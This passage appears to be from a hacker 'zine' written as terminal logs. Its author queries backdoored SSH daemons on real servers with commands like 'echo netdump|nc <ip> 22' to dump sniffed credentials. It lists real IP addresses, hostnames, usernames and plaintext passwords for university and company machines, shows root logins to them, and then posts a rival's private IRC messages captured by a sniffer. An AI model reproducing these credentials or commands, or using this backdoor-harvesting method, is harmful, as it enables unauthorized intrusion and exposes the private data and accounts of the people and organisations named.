+-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- + +central@labsec [~xoxox/h3h3] # telnet 212.111.196.163 22 +Trying 212.111.196.163... +Connected to 212.111.196.163. +Escape character is '^]'. +SSH-2.0-OpenSSH_4.7 +netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> i DEMAND THE PASSWORD ! +SSH2_OUT: 127.0.0.1 user: root pass: x4rtuhg6 (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> oh, i missed you, localhost. +pass_from: ::ffff:10.66.10.111 user: root pass: dihlordifenil --------->>>>>>>>>>>>>>>>>>>>>>>>> h3h3 >;( + +central@labsec [~xoxox/h3h3] # ssh root@212.111.196.163 +root@212.111.196.163's password: + +Last login: Fri Aug 8 19:49:52 2008 from 189.4.161.222 ------------>>>>>>>>>>>>>> lets laugh for a while now + + **** Connected to **** + + ### # ### ## ### ## ### ### ###### ###### + ## # ## # ## ## ## # ## # # ## # + #### ### #### ### # #### ## + ### #### ## ##### ## ## + # ## ## ## ## ## ## ## ## ## + #### #### ## #### ### ## ###### #### 1.0 + **** Linux users 2.6.23-gentoo i686 **** + +root@users:~# +root@users:~# uname -a;w;/sbin/ifconfig -a|grep inet +Linux users 2.6.23-gentoo #4 SMP PREEMPT Fri Dec 14 19:43:35 EET 2007 i686 Intel(R) Xeon(TM) CPU 3.00GHz GenuineIntel GNU/Linux + 10:49:08 up 171 days, 22:37, 1 user, load average: 0.20, 0.24, 0.21 +USER TTY LOGIN@ IDLE JCPU PCPU WHAT +root pts/0 10:46 0.00s 0.44s 0.00s w + inet addr:192.168.253.3 Bcast:192.168.253.255 Mask:255.255.255.0 + inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link + inet addr:169.254.78.132 Bcast:169.254.255.255 Mask:255.255.0.0 + inet addr:127.0.0.1 Mask:255.0.0.0 + inet6 addr: ::1/128 Scope:Host + inet addr:212.111.196.163 Bcast:212.111.196.191 Mask:255.255.255.224 + inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link + inet addr:212.26.143.6 Bcast:212.26.143.7 Mask:255.255.255.252 + inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link + +-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- + +central@labsec [~xoxox/h3h3] # telnet 212.143.216.226 22 +Trying 212.143.216.226... +Connected to 212.143.216.226. +Escape character is '^]'. +SSH-2.0-OpenSSH_4.3 +netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> im getting tired of this. +pam_from: 62.219.238.196 user: root pass: QWERFcxz (mail2.tikalnetworks.com) ----->>>>>>>> no kidding. + +central@labsec [~xoxox/h3h3] # ssh root@212.143.216.226 +root@212.143.216.226's password: + +jessica temp # uname -a;w;/sbin/ifconfig -a|grep inet +Linux jessica 2.6.17-gentoo-r7 #3 Sun Sep 3 11:17:41 IDT 2006 i686 Intel(R) Celeron(R) CPU 2.66GHz GenuineIntel GNU/Linux + 09:58:11 up 3 days, 18:03, 1 user, load average: 1.29, 1.16, 1.08 +USER TTY LOGIN@ IDLE JCPU PCPU WHAT +root pts/0 09:34 16:19 0.32s 0.30s ssh 10.0.0.3 + inet addr:10.0.0.253 Bcast:10.0.0.255 Mask:255.255.255.0 + inet addr:127.0.0.1 Mask:255.0.0.0 + +-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- + +central@labsec [~xoxox/h3h3] # echo netdump|nc 143.107.133.103 22|grep OUT +SSH2_OUT: 143.107.133.38 user: wlscopel pass: va1513zb (feynman.if.usp.br) +SSH2_OUT: 143.107.133.233 user: pdborges pass: mipa0529 (aegir.if.usp.br) +SSH2_OUT: 143.106.42.243 user: luana pass: 103174b (athenas.cna.unicamp.br) +SSH2_OUT: 143.107.133.8 user: kpp pass: fth6mdy (landauer.if.usp.br) +SSH2_OUT: 143.107.133.47 user: luana pass: 103174b (schroedinger.if.usp.br) +SSH2_OUT: 143.107.133.76 user: mvarella pass: CH3Ftri (planck.if.usp.br) +SSH2_OUT: 143.107.133.38 user: wlscopel pass: va1513zb (feynman.if.usp.br) +SSH2_OUT: 143.107.133.47 user: cedric pass: KunD1cka (schroedinger.if.usp.br) + +central@labsec [~xoxox/h3h3] # echo netdump|nc 143.107.133.103 22|grep from|grep -v bullshit +pass_from: 143.107.133.244 user: hmf18 pass: xpx9b15+ (turista.if.usp.br) +pass_from: 201.52.218.156 user: cedric pass: P1chona04 (c934da9c.virtua.com.br) +pass_from: 201.82.105.213 user: mfsoares pass: 3p1t@xy (c95269d5.virtua.com.br) +pass_from: 189.34.88.209 user: kpp pass: mdc6gpt (bd2258d1.virtua.com.br) +pass_from: 189.102.19.167 user: pontes pass: r@s&09* (bd6613a7.virtua.com.br) +pass_from: 189.102.98.126 user: lassali pass: las2008ro (bd66627e.virtua.com.br) + + + +central@labsec [~xoxox/h3h3] # ssh root@143.107.133.103 'uname -a' +root@143.107.133.103's password: + +Linux romeo 2.6.5-7.286-smp #1 SMP Thu May 31 10:12:58 UTC 2007 x86_64 x86_64 x86_64 GNU/Linux + +-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- + +central@labsec [~xoxox/h3h3] # telnet 200.144.186.37 22 +Trying 200.144.186.37... +Connected to shark.lcca.usp.br (200.144.186.37). +Escape character is '^]'. +SSH-2.0-OpenSSH_4.3 +netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> k from now on, no more netdump messages +SSH2_OUT: 127.0.0.1 user: root pass: UspNNNNd (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> just got tired, u knoW +SSH2_OUT: 127.0.0.1 user: amazonas pass: UspNNNNd (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> anyway im almost stopping pasting stuff + +-> alot of kool shit regarding usp.br here +try yourself-> echo netdump|nc 200.144.186.37 22|grep usp.br +or just grep OUT + +kthxnpurwelcome + +-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- + +central@labsec [~xoxox/h3h3] # echo netdump|nc 200.145.203.74 22|grep localhost +SSH2_OUT: 127.0.0.1 user: root pass: ArmY1*00 (localhost) ->>>>>>>>>>>>>>>>> im glad you are here :) kind of makes it easy + +central@labsec [~xoxox/h3h3] # ssh root@200.145.203.74 +root@200.145.203.74's password: + +Last login: Thu Jul 31 09:30:33 2008 from nemo.df.ibilce.unesp.br + + **** Connected to **** + + ### # ### ## ### ## ### ### ###### ###### + ## # ## # ## ## ## # ## # # ## # + #### ### #### ### # #### ## + ### #### ## ##### ## ## + # ## ## ## ## ## ## ## ## ## + #### #### ## #### ### ## ###### #### 1.0 + **** Linux hobbes 2.6.18-6-686 i686 **** + +root@hobbes:~# +root@hobbes:~# uname -a;w;/sbin/ifconfig -a|grep inet +Linux hobbes 2.6.18-6-686 #1 SMP Fri Jun 6 22:22:11 UTC 2008 i686 GNU/Linux + 05:47:44 up 27 days, 15:12, 1 user, load average: 0.21, 0.15, 0.06 +USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT +rico :0 - 06Aug08 ?xdm? 5:39 0.71s x-session-manager + inet addr:200.145.203.74 Bcast:200.145.203.255 Mask:255.255.255.0 + inet6 addr: fe80::2e0:7dff:fed7:f778/64 Scope:Link + inet addr:127.0.0.1 Mask:255.0.0.0 + inet6 addr: ::1/128 Scope:Host +root@hobbes:~# + +central@labsec [~xoxox/h3h3] # echo netdump|nc 200.145.203.74 22|grep unesp +pass_from: 200.145.203.42 user: rico pass: so31fia12 (nemo.df.ibilce.unesp.br) +SSH2_OUT: 200.145.203.42 user: ronaldo pass: LANmu80 (nemo.df.ibilce.unesp.br) + +-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- + +central@labsec [~xoxox/h3h3] # telnet 67.15.56.12 22 +Trying 67.15.56.12... +Connected to 67.15.56.12. +Escape character is '^]'. +SSH-1.99-OpenSSH_3.9 +netdump +SSH2_OUT: 127.0.0.1 user: root pass: l3nny1nt3l (localhost) +SSH2_OUT: 127.0.0.1 user: lenny pass: l3nny1nt3l (localhost) +pass_from: 76.188.180.141 user: joe pass: 1207j0s3ph7ys0n9813 (cpe-76-188-180-141.neo.res.rr.com) +pass_from: 76.188.180.141 user: devel pass: ha1W0;rlD.0121 (cpe-76-188-180-141.neo.res.rr.com) +pass_from: 76.188.180.141 user: celtrust pass: 1207j0s3ph9813 (cpe-76-188-180-141.neo.res.rr.com) + + + +central@labsec [~xoxox/h3h3] # ssh root@67.15.56.12 +root@67.15.56.12's password: + +Last login: Tue Aug 12 00:51:58 2008 from c-98-234-65-222.hsd1.ca.comcast.net + + **** Connected to **** + + ### # ### ## ### ## ### ### ###### ###### + ## # ## # ## ## ## # ## # # ## # + #### ### #### ### # #### ## + ### #### ## ##### ## ## + # ## ## ## ## ## ## ## ## ## + #### #### ## #### ### ## ###### #### 1.0 + **** Linux f1.celtrust.com 2.6.9-34.ELsmp i686 **** + +[root[@f1 ~]# +[root[@f1 ~]# uname -a;w;/sbin/ifconfig -a|grep inet +Linux f1.celtrust.com 2.6.9-34.ELsmp #1 SMP Fri Feb 24 16:54:53 EST 2006 i686 i686 i386 GNU/Linux + 05:20:15 up 153 days, 9:30, 0 users, load average: 2.62, 1.27, 0.63 +USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT + inet addr:67.15.56.12 Bcast:67.15.57.255 Mask:255.255.254.0 + inet6 addr: fe80::211:11ff:fe67:a66b/64 Scope:Link + inet addr:67.15.57.240 Bcast:67.15.57.255 Mask:255.255.255.0 + inet addr:67.15.57.241 Bcast:67.15.57.255 Mask:255.255.255.0 + +-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- + +central@labsec [~xoxox/h3h3] # ssh root@66.119.174.19 +root@66.119.174.19's password: + + + + **** Connected to **** + + ### # ### ## ### ## ### ### ###### ###### + ## # ## # ## ## ## # ## # # ## # + #### ### #### ### # #### ## + ### #### ## ##### ## ## + # ## ## ## ## ## ## ## ## ## + #### #### ## #### ### ## ###### #### 1.0 + **** Linux res1.van.metrobridge.net 2.6.18-5-686 i686 **** + +root@res1:~# +root@res1:~# uname -a;w;/sbin/ifconfig -a|grep inet +Linux res1.van.metrobridge.net 2.6.18-5-686 #1 SMP Fri Jun 1 00:47:00 UTC 2007 i686 GNU/Linux + 12:54:34 up 315 days, 17:40, 4 users, load average: 0.58, 0.35, 0.27 +USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT +sky pts/0 66.119.176.2 11:41 1:12 0.00s 0.00s -bash +sky pts/3 66.119.176.2 Tue15 20:53 0.18s 0.00s sshd: sky [priv] +sky pts/6 66.119.176.2 11:42 1:10 0.16s 0.01s sshd: sky [priv] +vee pts/7 74.221.143.3 12:23 28:41m 0.07s 0.00s telnet seton-3550 + inet addr:66.119.174.4 Bcast:66.119.174.15 Mask:255.255.255.240 + inet6 addr: fe80::219:b9ff:fee1:c808/64 Scope:Link + inet addr:66.119.174.29 Bcast:66.119.174.31 Mask:255.255.255.240 + inet addr:65.39.152.235 Bcast:65.39.152.255 Mask:255.255.255.224 + inet addr:65.39.152.237 Bcast:65.39.152.255 Mask:255.255.255.224 + inet addr:66.119.174.19 Bcast:66.119.174.31 Mask:255.255.255.240 + inet addr:65.39.152.239 Bcast:65.39.152.255 Mask:255.255.255.224 + inet addr:66.119.174.3 Bcast:66.119.174.15 Mask:255.255.255.240 + inet addr:66.119.174.2 Bcast:66.119.174.15 Mask:255.255.255.240 + +pass_from: 66.119.176.2 user: simon pass: pass77 (mail.metrobridge.com) [whole metrobridge with the same pass] +pass_from: 66.119.176.2 user: sky pass: rotoFro7 (mail.metrobridge.com) [whole metrobridge with the same pass] + +have fun + +- what a shame.. again, metrobridge ? i told you to keep on eye on your sshd since your zine :( + + +-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- + +central@labsec [~xoxox/h3h3] # ssh root@200.239.200.102 +root@200.239.200.102's password: + +Last login: Mon Aug 11 09:09:40 2008 from stml030.microlink.com.br +Linux 2.6.11.12-ul1. + + **** Connected to **** + + ### # ### ## ### ## ### ### ###### ###### + ## # ## # ## ## ## # ## # # ## # + #### ### #### ### # #### ## + ### #### ## ##### ## ## + # ## ## ## ## ## ## ## ## ## + #### #### ## #### ### ## ###### #### 1.0 + **** Linux proxy2-rj 2.6.11.12-ul1 i686 **** + +root@proxy2-rj:~# +root@proxy2-rj:~# uname -a;hostname -f;w +Linux proxy2-rj 2.6.11.12-ul1 #1 Tue Aug 30 12:40:56 BRT 2005 i686 unknown +proxy2-rj.pop-rio.com.br + 17:14:22 up 97 days, 5:09, 0 users, load average: 2.16, 1.88, 1.76 +USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT +root@proxy2-rj:~# +root@proxy2-rj:~# ./sshread mac.h|grep 200\.239|sort|uniq +pass_from: 200.239.245.50 user: root pass: Beth01@ (gwpr03.microlink.com.br) +pass_from: 200.239.245.70 user: root pass: pa$$w0rd (Froes.microlink.com.br) +root@proxy2-rj:~# ./sshread mac.h|grep OUT +SSH2_OUT: 127.0.0.1 user: root pass: BuCaaAadd (localhost) -----> /me laughs + +-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\- + +central@labsec [~xoxox/h3h3] # ssh root@143.107.250.214 +root@143.107.250.214's password: + +Last login: Fri Jun 13 14:58:50 2008 from 143-107-55-100.iq.usp.br + + ..... !! HELLO WORLD !! ..... + + @@@@@@ @@@@@@ + @@ @@ @@ @@ + @@ @@ @@ @@@ @@ @@ @@ @@@ @@ @@ + @@ @@ @@ @ @@ @@ @@ @@ @ @@ @@ @@ + IIII II I II IIII II I II IIII + IIII III II IIII III II IIII + II II II II II II II II II II + II II IIIIII II II IIIIII II II + **** Linux noelrosa.iq.usp.br 2.6.9-42.0.10.EL x86_64 **** ->>>> new kool motd, n1cE rIpZ + +[root[@noelrosa ~]# + +<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< s0RrY bUT We g0T tiReD oF pAstIng StUfF lIkE thAT >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> +-;;;;;;; i think thats enough to paste, right ? +-;;;;;; anyway, in the end/bottom of this 'zine' there is a file to download with some of the ip's that weve got from them + +-/-/-/-/-/-/-/-/-/-/ lEtz havE fuN WiTH r47's BnC rigHT noW -/-/-/-/-/-/-/-/-/-/ + +r47 is r47@bl4ckh47.org * i own u! [and We own you!] +r47 on @#combat #osiris @#/<-rad +r47 using irc.ipv6.he.net Hurricane Electric IPV6 IRC Server +r47 actually using host 2001:470:1f15:42b::3 +r47 End of /WHOIS list. + +central@labsec [~xoxox/h3h3] # ssh root@bl4ckh47.org -p 2222 bash + +root@bl4ckh47.org's password: .niklincith08. (same pass goes for all casablanca.cz/eurosignal.cz) +uname -a;w;hostname -f +Linux VoIP-Mnisek 2.6.18-3-k7-pj #2 Tue Feb 27 18:30:13 CET 2007 i686 GNU/Linux + 10:13:26 up 162 days, 8:25, 0 users, load average: 0.04, 0.05, 0.01 +USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT +VoIP.eurosignal.cz + +sit0 Link encap:IPv6-in-IPv4 + inet6 addr: ::10.0.2.254/96 Scope:Compat + inet6 addr: ::127.0.0.1/96 Scope:Unknown + inet6 addr: ::10.0.2.4/96 Scope:Compat + inet6 addr: ::77.78.84.242/96 Scope:Compat + UP RUNNING NOARP MTU:1480 Metric:1 + RX packets:0 errors:0 dropped:0 overruns:0 frame:0 + TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:0 + RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) + +sit1 Link encap:IPv6-in-IPv4 + inet6 addr: 2001:470:1f15:42b::2/64 Scope:Global + inet6 addr: 2001:470:1f15:42b::3/64 Scope:Global + inet6 addr: 2001:470:1f15:42b::4/64 Scope:Global + inet6 addr: 2001:470:1f15:42b::5/64 Scope:Global + inet6 addr: 2001:470:1f15:42b::6/64 Scope:Global + inet6 addr: 2001:470:1f15:42b::7/64 Scope:Global + inet6 addr: fe80::a00:2fe/64 Scope:Link + inet6 addr: fe80::a00:204/64 Scope:Link + inet6 addr: fe80::4d4e:54f2/64 Scope:Link + UP POINTOPOINT RUNNING NOARP MTU:1480 Metric:1 + RX packets:16700 errors:0 dropped:0 overruns:0 frame:0 + TX packets:9917 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:0 + RX bytes:1677861 (1.6 MiB) TX bytes:982003 (958.9 KiB) + +tcp 0 0 77.48.84.242:65535 189.4.189.139:61593 ESTABLISHED +tcp6 0 0 2001:470:1f15:42b:51338 2001:41e0:5::6667:6667 ESTABLISHED +tcp6 0 0 2001:470:1f15:42b:49197 2001:470:0:6667::2:6667 ESTABLISHED +tcp6 0 0 2001:470:1f15:42b:48159 2001:40a8:3000:1:0:6667 ESTABLISHED +tcp6 0 0 2001:470:1f15:42b:51411 2001:40a8:3000:1:0:6667 ESTABLISHED + +perl 12655 root 4u IPv4 3027913 TCP *:65535 (LISTEN) +root 12655 0.0 0.3 5256 3220 ? S Mar19 2:39 supervise log +- nice process name btw +- lets start the sniffer, shall we? - btw im using the ircsniff.pl you stole from efnet's box, thanks - + +<- :d0n_!burnout@burnout.bitchx.org PRIVMSG r47 :u know d0n +<- :d0n_!burnout@burnout.bitchx.org PRIVMSG r47 :he took my nick +<- :d0n_!burnout@burnout.bitchx.org PRIVMSG r47 :he's packeting me +<- :d0n_!burnout@burnout.bitchx.org PRIVMSG r47 :;\ +-> PRIVMSG d0n_ :d0n No such nick/channel +-> PRIVMSG d0n_ :d0n End of /WHOIS list. +-> PRIVMSG d0n_ :change +<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :lamer :( +<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :owns my dsl +<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :real leet +-> PRIVMSG d0n :who ? +<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :that d0n guy +<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :had my nick +<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :was talking shit +<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :"here comes the ddos" he said +-> PRIVMSG d0n :fuck +-> PRIVMSG d0n :lets hack him +-> PRIVMSG d0n :not hard target +-> PRIVMSG d0n :hehehe +-> PRIVMSG d0n :to me +<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :HHEHEHEEH\ +-> PRIVMSG d0n ::>:>:>:> +-> PRIVMSG d0n :sup bitchx +-> PRIVMSG d0n ::> +<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 ::) +-> PRIVMSG d0n :bitchx bugged +-> PRIVMSG d0n :do u use it ? +<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :the client? +-> PRIVMSG d0n :yah +-> PRIVMSG d0n :0dayz +<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :no shit.. +-> PRIVMSG d0n :eheh + +*********************** run to the hillz he h4s b1tchx 0d4y ********************** + +-> PRIVMSG d0n :i have windows on linux (vmware) ->>>>>>>>>>>>>>>>>>>>> lies +-> PRIVMSG d0n :hjmm +-> PRIVMSG d0n :;> +<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :ah yeah +-> PRIVMSG d0n :omfg +<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :any more fun with efnet soon? +-> PRIVMSG d0n :im still drunked +-> PRIVMSG d0n :no more +<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :HEHE +-> PRIVMSG d0n :im stoped with x0x0x +<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :;p +-> PRIVMSG d0n :just sniffing idiots now ->>>>>>>>>>>>>>>>>>>> so we are + +*********************** /laugh time ******************************************** +-> PRIVMSG accuser :nem +-> PRIVMSG accuser :nao me comunico mais com povo br ->>>>>>>>>>>>>>>>>>>> +-> PRIVMSG accuser :nao eh meu nivel +-> PRIVMSG accuser :so alguns amigos +-> PRIVMSG accuser :nego roubo meu canal ontem ->>>>>>>>>>>>>>>>>>>> some guyz stole my network baby +-> PRIVMSG accuser :recuperei +-> PRIVMSG accuser :e tomei o nick deles ->>>>>>>>>>>>>>>>>>>> i ddosed them and got their nicks +-> PRIVMSG accuser :/w psys +-> PRIVMSG accuser :/w dtr +-> PRIVMSG accuser :hehehe ->>>>>>>>>>>>>>>>>>>> now i feel gr8 +<- :accuser!~psy@64.244.62.214 PRIVMSG r47 :eu vi +<- :accuser!~psy@64.244.62.214 PRIVMSG r47 :o psys tacando monte de bot +-> PRIVMSG accuser :comigo eh dificil um br poder ->>>>>>>>>>>>>>>>>>>> HAHAHAHAHAHAHAHAAHHAHAHAHAHAHAHAHA (12x) +-> PRIVMSG accuser :hehehe +-> PRIVMSG accuser :eu mando! ->>>>>>>>>>>>>>>>>>>> im THE guy! +-> PRIVMSG accuser :eu to mo fora de guerra cara +-> PRIVMSG accuser :mas parece q os caras me perseguem +-> PRIVMSG accuser :e sismam q sou lamer ->>>>>>>>>>>>>>>>>>>> /me laughs +-> PRIVMSG accuser :rs + +-> PRIVMSG sexybaby :itsme q_+T*/81_3|Z3g; r47 ->>>>>>>>>>>>>>>>>>>> hiz botz, thanks for sharing +-> PRIVMSG sexybaby :op q_+T*/81_3|Z3g; +sexybaby on @#brasil @+#Sonya @#24/7 @+#prank @#unforgiven @#serious @#xanax ->>>>>>>>>>>>>>>>>>>> 3h3h3h3 + +<- :KoaL4!h@216.75.56.186 PRIVMSG r47 :c vai me ajeita un trem que presta entum? ->>>>>>>>>>>>>>>>> gimm3 a b0x +-> PRIVMSG KoaL4 :cara +-> PRIVMSG KoaL4 :vou +-> PRIVMSG KoaL4 :mas nao me atrapalha +-> PRIVMSG KoaL4 :to aki programando +-> PRIVMSG KoaL4 :pra um cliente chato pra kct + +<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :ta +<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :arrumando truta +<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :com os cara da defland pq +<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :? +-> PRIVMSG \g4br13l\ :falaram meu nome em vao +-> PRIVMSG \g4br13l\ :nao qro isso +-> PRIVMSG \g4br13l\ :so isso +<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :r47 +<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :tu se esquenta +<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :com bobagem +-> PRIVMSG \g4br13l\ :hehee +<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :? +-> PRIVMSG \g4br13l\ :nao qro pivete +-> PRIVMSG \g4br13l\ :de merda +-> PRIVMSG \g4br13l\ :kiddie +-> PRIVMSG \g4br13l\ :falando de mim +-> PRIVMSG \g4br13l\ :pq qm manda ----->>>>>>>>>>>>> HAHAHAHAHAHAHAHAHAHAHAHA +-> PRIVMSG \g4br13l\ :sou eu ----->>>>>>>>>>>>> HAHAHAHAHAHAHAHAHAHAHAHA +-> PRIVMSG \g4br13l\ ::> +-> PRIVMSG \g4br13l\ :esse univie.ac.at eh show +-> PRIVMSG \g4br13l\ :tenho a www la +-> PRIVMSG \g4br13l\ ::> +-> PRIVMSG \g4br13l\ :usam checkpoint firewall one ----->>>>>>>>>>>>> what the fuck ? +-> PRIVMSG \g4br13l\ :tunnelling by trace ----->>>>>>>>>>>>> ?!?1 +-> PRIVMSG \g4br13l\ :mto dificil pacota-la + + +*********************** boyfriends are fighting - portuguese only, sorry ********************** +-> PRIVMSG #thc :skotch is gay +-> PRIVMSG skotch :eai vagabunda +-> PRIVMSG skotch :vai fica na putaria ateh qdo +-> PRIVMSG skotch :to cheio de novidades +-> PRIVMSG skotch :e para de me chamar de verme +-> PRIVMSG skotch :rs +<- ::skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :vai toma no meu do teu cuh rapa, n qro papo contigo e ve se para de fica mandando alerta no meu nextel -> gtfo +-> PRIVMSG skotch :ahahaha +-> PRIVMSG skotch :vc tem certeza ->>>>>>>>> are you sure baby ? +-> PRIVMSG skotch :entao eh isso ? +-> PRIVMSG skotch :ja era ?: +-> PRIVMSG skotch :ja era ? +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :sim +-> PRIVMSG skotch :eu nao vou voltar aki denovo +-> PRIVMSG skotch :pra falar com vc +-> PRIVMSG skotch :ja era ? +-> PRIVMSG skotch :CERTEZA? ->>>>>>>> are you sure we are breaking apart????? +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :alias quem ta oltando aki direto eh vc, eu to na minha faz tempo +-> PRIVMSG skotch :to na minha tb +-> PRIVMSG skotch :so acho +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :vc fala merda e dps quer voltar a tras +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :coisa de mlk +-> PRIVMSG skotch :filho +-> PRIVMSG skotch :eu so acho +-> PRIVMSG skotch :q eh besteira +-> PRIVMSG skotch :agente brigasr por isso +-> PRIVMSG skotch :so isso +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :mermao n eh a primeira vez +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :q tu da dessas +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :vem falando bosta +:skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :e dps vem se desculpando +-> PRIVMSG skotch :so joguei um verde +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :n so esses verme de merda +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :q paga pau pra vc +-> PRIVMSG skotch :nao vou fazer isso denovo +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :q aceita tudo q vc fala +-> PRIVMSG skotch :whatever +-> PRIVMSG skotch :nao falei q tu paga sapo pra mim +-> PRIVMSG skotch :tu tb +-> PRIVMSG skotch :eh cheio das noia q nem eu +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :tu soh mostro q n confia +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :axando q eu passo maq pra xscholler +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :aff +-> PRIVMSG skotch :porra +-> PRIVMSG skotch :tu some +-> PRIVMSG skotch :so joguei um verde +-> PRIVMSG skotch :se nao confiasse +-> PRIVMSG skotch :tu nao tinha +-> PRIVMSG skotch :tds minhas box +-> PRIVMSG skotch :TODAS +-> PRIVMSG skotch :fdp +-> PRIVMSG skotch :outra coisa +-> PRIVMSG skotch :descobri +-> PRIVMSG skotch :o klux +-> PRIVMSG skotch :tem root na importec ->>>>>> klux has root in importec[their box] (you are right sir!) +-> PRIVMSG skotch :NAO USA MAIS ELA DE PONTE ->>>>>> dont use 